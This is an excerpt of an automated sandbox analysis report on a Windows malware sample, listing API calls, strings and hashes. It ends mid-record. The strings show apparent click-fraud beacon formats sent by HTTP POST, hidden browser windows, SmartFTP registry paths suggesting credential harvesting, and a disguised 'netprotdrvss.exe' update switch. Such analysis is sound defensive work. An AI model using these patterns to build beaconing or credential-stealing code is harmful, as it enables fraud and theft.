                    • Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
                  • String ID: Shell_TrayWnd$eventConn
                  • API String ID: 2141107913-3455059086
                  • Opcode ID: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                  • Instruction ID: 39c15930e577ecb7297998fc23ff8408fdcdb7101606cb16b0d9d8475b405f16
                  • Opcode Fuzzy Hash: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                  • Instruction Fuzzy Hash: 05216834900214EFDB10AFA4CD89FAB7BB9EF0A311F2046B5F901EA2A1C7755D54CB96
                  APIs
                  • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
                  • GetLocalTime.KERNEL32(?), ref: 00407387
                  • GetLocalTime.KERNEL32(?), ref: 0040738D
                  • GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
                  • CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
                  • String ID:
                  • API String ID: 3166187867-0
                  • Opcode ID: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
                  • Instruction ID: 26b14636c49f8a61fb06fac8b942a3fa68f3078aba47330515a101c34858e503
                  • Opcode Fuzzy Hash: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
                  • Instruction Fuzzy Hash: 8B316FB2D1022DAACF04EBE5DD459EEB7BDEF44304F10406AF901B3290E7746A04DB69
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 004099EB
                  • SysAllocString.OLEAUT32(?), ref: 004099F9
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: AllocString
                  • String ID: </domain>$</url>$<domain>$<url>$http://
                  • API String ID: 2525500382-924421446
                  • Opcode ID: c25fc9fce4e3a5af282b7e8b70485abd1f5e468527c2347077a4c4f87a84cc63
                  • Instruction ID: c36137c4092f7a01c2c9ac5e3109157182881aca1e17db191de13133e2ad13bf
                  • Opcode Fuzzy Hash: c25fc9fce4e3a5af282b7e8b70485abd1f5e468527c2347077a4c4f87a84cc63
                  • Instruction Fuzzy Hash: D521D876600218A6DB61AB59CC41BDB33E4FB44794F14407FE508B32C2EB785E4D4F99
                  APIs
                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  • Sleep.KERNEL32(00002710,00000000,00000400,00000000), ref: 0040ACAE
                  • Sleep.KERNEL32(0000EA60), ref: 0040AD76
                  • Sleep.KERNEL32(00002710), ref: 0040ADA4
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: Sleep$AttemptConnectInternet
                  • String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
                  • API String ID: 362191241-2593661552
                  • Opcode ID: e876ecf8844ea65909d5912cf1b13aa36029654f48e96db610e819274c2e0ff8
                  • Instruction ID: b79182b1151443badf469ae5f9ae195c128285790c89deda34db11c37ea10ffc
                  • Opcode Fuzzy Hash: e876ecf8844ea65909d5912cf1b13aa36029654f48e96db610e819274c2e0ff8
                  • Instruction Fuzzy Hash: 0531C471D00208ABCF20ABA6DC859AE77BAEF80309F10847BE505B72C1DA7849558B5B
                  APIs
                  • _ValidateScopeTableHandlers.LIBCMT ref: 0040D892
                  • __FindPESection.LIBCMT ref: 0040D8AC
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: FindHandlersScopeSectionTableValidate
                  • String ID:
                  • API String ID: 876702719-0
                  • Opcode ID: 534d7b056b49e296d3a3fc6e9a3ba6c277fd5c62c59754af54bacd0a8e696194
                  • Instruction ID: 4070355c3de93ac57746f54d9fb9ba92a54bad1974282013f33c457a7dad05b0
                  • Opcode Fuzzy Hash: 534d7b056b49e296d3a3fc6e9a3ba6c277fd5c62c59754af54bacd0a8e696194
                  • Instruction Fuzzy Hash: 96A1C172F042158BCB24CF98D981B6E77B1EB84314F56813AD815A73D0DB39AC49CB9D
                  APIs
                  • Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
                  • Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
                  • Sleep.KERNEL32(00002710,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8CC
                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8E5
                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8EC
                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
                  • String ID: 0$confirm^rev=%s^code=%s^param=%s^os=%s
                  • API String ID: 3100629401-2436734164
                  • Opcode ID: 9652d423a98df953dd9117dceebf08b302c82fbb0c377fe7acd8f7bbba186267
                  • Instruction ID: 7defdabbc875a2827947a9af70fbac2689cb4d570e6f2fffa55db425585f7fd8
                  • Opcode Fuzzy Hash: 9652d423a98df953dd9117dceebf08b302c82fbb0c377fe7acd8f7bbba186267
                  • Instruction Fuzzy Hash: C0418372D00618AACB11EBE1DC859DF73BCEF44304F10847BF505B6181EA789A558F9E
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 004094E6
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: FreeString
                  • String ID:
                  • API String ID: 3341692771-0
                  • Opcode ID: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                  • Instruction ID: b8745a711dcf8da59f3798694fa3079dcf63c40c9cdbadd59c4d39193402e254
                  • Opcode Fuzzy Hash: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                  • Instruction Fuzzy Hash: C9214832A00108BBDB01DFAADC44B9E7BB8EF48345F1484B6E805F71A1D774AE41DB84
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000000,UniqueNum), ref: 0040784D
                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
                  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
                  • CloseHandle.KERNEL32(00000000), ref: 00407880
                  • GetTickCount.KERNEL32 ref: 00407888
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: File$CloseCountCreateHandleModuleNameTickTime
                  • String ID: UniqueNum
                  • API String ID: 1853814767-3816303966
                  • Opcode ID: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
                  • Instruction ID: 2f8cc66c71eb5b32faf52737d8a911681d4da4e376004c23895cdbe2f04b10ac
                  • Opcode Fuzzy Hash: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
                  • Instruction Fuzzy Hash: AE110633419220ABD210AB65EC4CA9B7FACEF45760F004A3AF964E21D0D6349211C7AB
                  APIs
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
                  • ReadFile.KERNEL32(?,00000064,00000001,00000000), ref: 00407E74
                    • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                    • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: File$CreateModuleNamePointerRead
                  • String ID: UniqueNum$d$hOAd$x
                  • API String ID: 1528952607-1018652783
                  • Opcode ID: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                  • Instruction ID: 0df55d11f519ebf6f0451cc58b4543fb7278309a9039aac926228ebb90f40a66
                  • Opcode Fuzzy Hash: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                  • Instruction Fuzzy Hash: 5311A531D09308AADF109B61DD05BDB3B6AAB00324F218676E612F61E0E7749D44CBAE
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 00409B00
                  • SysAllocString.OLEAUT32(?), ref: 00409B0E
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: AllocString
                  • String ID: </title>$</url>$<title>$<url>
                  • API String ID: 2525500382-2286408829
                  • Opcode ID: c58bfd32acaee4a5c903d43745ebae325062404d958fadf76014dbdfc3d1efc4
                  • Instruction ID: e94fff7a9c4556839c155ffec7726d55edf757161a42396596b5093e86978141
                  • Opcode Fuzzy Hash: c58bfd32acaee4a5c903d43745ebae325062404d958fadf76014dbdfc3d1efc4
                  • Instruction Fuzzy Hash: 4F01DB7564021CA7DB116A55CC41FD637A8BB44799F044077FA04F32C3E978AA0C4BA4
                  APIs
                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  • Sleep.KERNEL32(00002710), ref: 0040A91C
                  • Sleep.KERNEL32(00002710), ref: 0040AAC1
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040AAE9
                  • HeapFree.KERNEL32(00000000), ref: 0040AAF0
                  Strings
                  • 0, xrefs: 0040AA5B
                  • jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: HeapSleep$AttemptConnectFreeInternetProcess
                  • String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
                  • API String ID: 3713053250-1268808612
                  • Opcode ID: 19d3b15b7a8b0c9143418604a1355860698edc262cce0da605c920d0b801a1a9
                  • Instruction ID: cb73c9a78e41fc00613c6eff30345c36a412e41c8c720ed22b53be089701fd16
                  • Opcode Fuzzy Hash: 19d3b15b7a8b0c9143418604a1355860698edc262cce0da605c920d0b801a1a9
                  • Instruction Fuzzy Hash: 88515072A00218A6CF10EB95DC959DF737DEF44308F40447BF406B7281EB789A958FAA
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 00409046
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: FreeString
                  • String ID:
                  • API String ID: 3341692771-0
                  • Opcode ID: 25e5ebd670c89fa3510599811e2d902ae63a41c81a89dab2abf1aa792f01bddc
                  • Instruction ID: 72e70a91572158687df8678bea7e51b1bbf589372677d733e04197d71cfd8d58
                  • Opcode Fuzzy Hash: 25e5ebd670c89fa3510599811e2d902ae63a41c81a89dab2abf1aa792f01bddc
                  • Instruction Fuzzy Hash: 0B41AE70600216EFDB10DF94C9885AD7BB2FB48309F2048BED581B7251C77A6E92DF08
                  APIs
                  • InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
                  • HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
                  • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: HttpInternetRequest$ConnectFileOpenReadSend
                  • String ID: POST
                  • API String ID: 961146071-1814004025
                  • Opcode ID: b231c6d6edeafd2a36d4afe3665cd665c01720833af24f413fd8087ba7bf51f5
                  • Instruction ID: 440a75f1c6cd1a7483e62584c22426b42aa3ce760e55699d8a89a0e8c7b72afb
                  • Opcode Fuzzy Hash: b231c6d6edeafd2a36d4afe3665cd665c01720833af24f413fd8087ba7bf51f5
                  • Instruction Fuzzy Hash: B8318E71900119BFDB10DBA4DC84EFE7679EB54349F14087AFA41B62C2D6385E448BA8
                  APIs
                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004051EB
                  Strings
                  • SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168
                  • personal favorites, xrefs: 00405176
                  • folder, xrefs: 00405184
                  • SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: EnvironmentExpandStrings
                  • String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
                  • API String ID: 237503144-821743658
                  • Opcode ID: d403c6e0ff69697be521eaf543c14185a1ab81bd096a87ce139bc0f4ede75b67
                  • Instruction ID: 0454e2dbaba930a1c05830d090df37f1eb9a44f33d61805f8e12f109ce5a2445
                  • Opcode Fuzzy Hash: d403c6e0ff69697be521eaf543c14185a1ab81bd096a87ce139bc0f4ede75b67
                  • Instruction Fuzzy Hash: 21213E71D00518ABDB10EB95DC41ADFB7BCEB44318F1084B7E514B2181EB389B49CFA9
                  APIs
                  • CoInitialize.OLE32(00000000), ref: 0040A0C0
                  • GetModuleHandleW.KERNEL32(00000000,00000000), ref: 0040A0CE
                  • CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: CreateHandleInitializeModuleWindow
                  • String ID: AtlAxWin$Shell.Explorer
                  • API String ID: 950422046-1300462704
                  • Opcode ID: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                  • Instruction ID: 8885d0d040d3ab3e1edd42f45155a7fe84e7bff231f75e8e802cb7627400a982
                  • Opcode Fuzzy Hash: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                  • Instruction Fuzzy Hash: 78118F30200200FFD320ABA6CC4CE6B7BBCEFCA711B240579F515EB291D7789801CA65
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
                  • CharLowerW.USER32(?), ref: 0040ABA0
                  • GetCommandLineW.KERNEL32 ref: 0040ABC0
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: CharCommandFileLineLowerModuleName
                  • String ID: /updatefile3$netprotdrvss.exe
                  • API String ID: 3118597399-3449771660
                  • Opcode ID: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                  • Instruction ID: 1eba2a713c21f7c79877a49aa3ec6850c44e44909145826ab611dd80b60fa5a6
                  • Opcode Fuzzy Hash: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                  • Instruction Fuzzy Hash: 41E09B3655021A5AD750FBB1DD07BA633ACFB01705F1049B6A246F10C0EE74D55D4F9D
                  APIs
                  • _memset.LIBCMT ref: 0040A26B
                  • SysAllocString.OLEAUT32(?), ref: 0040A28E
                  • SysAllocString.OLEAUT32(?), ref: 0040A296
                  • SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
                  • SysFreeString.OLEAUT32(?), ref: 0040A2CF
                    • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
                    • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
                    • Part of subcall function 00409FB1: Sleep.KERNEL32(00000064), ref: 00409FEC
                    • Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                    • Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
                  • String ID:
                  • API String ID: 3143865713-0
                  • Opcode ID: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                  • Instruction ID: bfa1c3e5fdaec5be4dfb18607c12502589e7fd5433bac8caf4aacda455aa0499
                  • Opcode Fuzzy Hash: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                  • Instruction Fuzzy Hash: 3A118F72D10219ABCB00DFA9DD448DEBBB9FF08354B11456AF415B7290E770AE14CFA4
                  APIs
                  • GetTickCount.KERNEL32 ref: 00409FCE
                  • GetTickCount.KERNEL32 ref: 00409FDE
                  • Sleep.KERNEL32(00000064), ref: 00409FEC
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                  • DispatchMessageW.USER32(?), ref: 0040A009
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: CountMessageTick$DispatchPeekSleep
                  • String ID:
                  • API String ID: 4159783438-0
                  • Opcode ID: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                  • Instruction ID: c0dc46c0c87f7bc49602bd7d2efae9f565a6f52602c3eafe7569a8fa2f6b8eea
                  • Opcode Fuzzy Hash: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                  • Instruction Fuzzy Hash: 3F118671D103199ECB10AFF5CC8899F7BB9BB45314B144A7AE161F71E0C778CA118B1A
                  APIs
                  • GetTickCount.KERNEL32 ref: 00409F5B
                  • GetTickCount.KERNEL32 ref: 00409F5F
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                  • DispatchMessageW.USER32(?), ref: 00409F80
                  • Sleep.KERNEL32(0000012C), ref: 00409F8D
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
